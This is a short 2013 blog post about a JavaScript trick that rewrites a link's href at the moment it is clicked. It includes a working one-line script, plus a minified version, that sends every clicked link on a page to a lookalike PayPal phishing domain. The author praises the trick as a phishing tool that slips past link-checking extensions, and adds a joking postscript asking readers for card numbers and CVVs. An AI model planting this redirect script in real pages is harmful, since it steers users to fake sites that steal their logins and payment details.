Hacking <a>

21 March 2013


So, I recently came across this article about modifying the href attribute of the <a> tag, after clicking on it. That's right, after. And javascript allows you to do that.

Although this may not seem like a serious threat, or even a threat at all at first glance, it's a pretty sweet phishing tool. Say, you're redirected to paypal for some purchase you're about to make, from some site. The link will pass all the malicious-link detecting extensions or add-ons you might have, cause it's paypal, right? That's legit. But, what happens after you do it? I redirect you to a site called http://gaypal.com (hehe) or something subtly similar to that. And i reel you in. It's a catch.

How simple is this?

var links = document.links; for(i in links) { links[i].onclick = function(){ this.href = 'http://gaypal.com'; }; }

Simple.

And the compressed version?

o=document.links;for(i in o){o[i].onclick=function(){this.href='//gaypal.com'}}

Simpler.

And I have to admit. The simplicity of this awesome hack blew my mind. But there is no reason for concern, as the top players have already fixed it.

Btw, can someone check on IE please?




P.S. Promoting general phishing and web-safety awareness, I have created a tool to check if your credit card is on any cracker's watch list. All you gotta do is send me your card number, CVV number and expiry date and I'll let you know ASAP.
Aww.. No need to thank me. Anytime.

P.P.S Here's the original article which has been receiving some amazing responses.